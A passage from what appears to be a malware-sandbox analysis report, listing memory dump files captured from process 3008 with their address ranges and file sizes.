          Filesize

          100KB

        • memory/3008-170-0x0000000140000000-0x0000000140809000-memory.dmp
          Filesize

          8.0MB

        • memory/3008-180-0x0000000140000000-0x0000000140809000-memory.dmp
          Filesize

          8.0MB

        • memory/3008-168-0x0000000140000000-0x0000000140809000-memory.dmp
          Filesize

          8.0MB

        • memory/3008-165-0x0000000140000000-0x0000000140809000-memory.dmp
          Filesize

          8.0MB

        • memory/3008-172-0x0000000140000000-0x0000000140809000-memory.dmp
          Filesize

          8.0MB

        • memory/3008-174-0x0000000140000000-0x0000000140809000-memory.dmp
          Filesize

          8.0MB

        • memory/3008-175-0x0000000140000000-0x0000000140809000-memory.dmp
          Filesize

          8.0MB

        • memory/3008-176-0x0000000140000000-0x0000000140809000-memory.dmp
          Filesize

          8.0MB

        • memory/3008-178-0x0000000140000000-0x0000000140809000-memory.dmp
          Filesize

          8.0MB

        • memory/3008-166-0x0000000140000000-0x0000000140809000-memory.dmp
          Filesize

          8.0MB

        • memory/3008-181-0x0000000140000000-0x0000000140809000-memory.dmp
          Filesize

          8.0MB

        • memory/3008-182-0x0000000140000000-0x0000000140809000-memory.dmp
          Filesize

          8.0MB

        • memory/3008-184-0x0000000140000000-0x0000000140809000-memory.dmp
          Filesize

          8.0MB

        • memory/3008-185-0x000000014036EAC4-mapping.dmp
        • memory/3008-187-0x0000000140000000-0x0000000140809000-memory.dmp
          Filesize

          8.0MB

        • memory/3008-188-0x0000000140000000-0x0000000140809000-memory.dmp
          Filesize

          8.0MB

        • memory/3008-189-0x0000000000120000-0x0000000000140000-memory.dmp
          Filesize

          128KB

        • memory/3008-190-0x0000000000000000-0x0000000001000000-memory.dmp
          Filesize

          16.0MB

        • memory/3008-191-0x0000000140000000-0x0000000140809000-memory.dmp
          Filesize

          8.0MB